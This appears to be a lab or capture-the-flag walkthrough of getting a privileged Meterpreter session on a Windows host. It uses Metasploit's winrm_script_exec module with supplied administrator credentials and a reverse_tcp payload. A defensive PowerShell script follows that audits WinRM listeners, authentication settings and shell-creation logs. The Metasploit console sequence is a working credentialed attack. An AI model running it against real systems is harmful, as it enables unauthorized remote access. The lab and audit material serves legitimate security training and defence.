Hello readers! I hope you are well and safe. In this post you will learn to exploit a vulnerable Windows service, WinRM, using PowerShell.
The WinRM service is used for PowerShell remoting, and the WSMan cmdlets in PowerShell manage WS-Management data on a local or remote computer. Read more about it from the following links to get a clear picture of what WSMan does.
You will see me using:
- the WSMan service to gain access to the target machine
- nmap to find open ports and services
So WSMan is served on port 5985. Let's find out whether there is an exploit for it.
Using the Metasploit module and the authentication creds provided in the lab:
msf6 > use exploit/windows/winrm/winrm_script_exec
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/winrm/winrm_script_exec) > set username administrator
username => administrator
msf6 exploit(windows/winrm/winrm_script_exec) > set password tinkerbell
password => tinkerbell
msf6 exploit(windows/winrm/winrm_script_exec) > set force_vbs true
force_vbs => true
msf6 exploit(windows/winrm/winrm_script_exec) > set rhosts 10.4.28.59
rhosts => 10.4.28.59
msf6 exploit(windows/winrm/winrm_script_exec) > run
Now wait for the stager to ship Meterpreter to the target system.
You got your flag and a privileged session.
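From the defender's side, here is an added example (not part of the original post or of the Metasploit module) that audits the WinRM/WSMan settings the credentialed attack above depends on: the HTTP listener behind port 5985, Basic or unencrypted authentication, the permissions on the default PowerShell endpoint, and the WinRM operational log entries (event ID 91, shell creation) that a winrm_script_exec session leaves behind. It assumes an elevated PowerShell session on the Windows host being audited, with the WinRM service running so that the WSMan: drive is available.

```powershell
# Added example, not from the original post: audit local WinRM exposure and
# list recent remote-shell creations. Run elevated on the host; the WSMan:
# drive only mounts while the WinRM service is running.

$findings = @()

$svc = Get-Service -Name WinRM -ErrorAction SilentlyContinue
if ($null -eq $svc -or $svc.Status -ne 'Running') {
    Write-Output 'WinRM service is not running; nothing is exposed.'
    return
}

# 1. Listeners: an HTTP listener bound to Address=* is what serves port 5985
#    on every interface, which is what the port scan above found.
foreach ($listener in Get-ChildItem -Path WSMan:\localhost\Listener) {
    $props     = Get-ChildItem -Path "WSMan:\localhost\Listener\$($listener.Name)"
    $transport = ($props | Where-Object { $_.Name -eq 'Transport' }).Value
    $address   = ($props | Where-Object { $_.Name -eq 'Address' }).Value
    $port      = ($props | Where-Object { $_.Name -eq 'Port' }).Value
    if ($transport -eq 'HTTP') {
        $findings += "HTTP listener on address '$address' port $port; prefer an HTTPS listener"
    }
}

# 2. Service-side authentication: Basic auth and unencrypted traffic let a
#    captured or guessed password be replayed by any WinRM client.
if ((Get-Item WSMan:\localhost\Service\Auth\Basic).Value -eq 'true') {
    $findings += 'Basic authentication is enabled on the service'
}
if ((Get-Item WSMan:\localhost\Service\AllowUnencrypted).Value -eq 'true') {
    $findings += 'AllowUnencrypted is true; WinRM will accept cleartext sessions'
}

# 3. Who may open the default PowerShell endpoint? Review anything beyond
#    Administrators and Remote Management Users.
$perm = (Get-PSSessionConfiguration -Name Microsoft.PowerShell).Permission
$findings += "Microsoft.PowerShell endpoint permission: $perm"

# 4. Detection: every remote shell (including the one winrm_script_exec opens)
#    is recorded as event ID 91 in Microsoft-Windows-WinRM/Operational.
$shells = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-WinRM/Operational'; Id = 91 } `
    -MaxEvents 20 -ErrorAction SilentlyContinue
foreach ($e in $shells) {
    $findings += "WSMan shell created at $($e.TimeCreated): $($e.Message)"
}

$findings | ForEach-Object { Write-Output "[finding] $_" }
```

Pair the listener and authentication findings with an account lockout policy and a non-default administrator password, since the lab session above succeeded only because valid credentials were available.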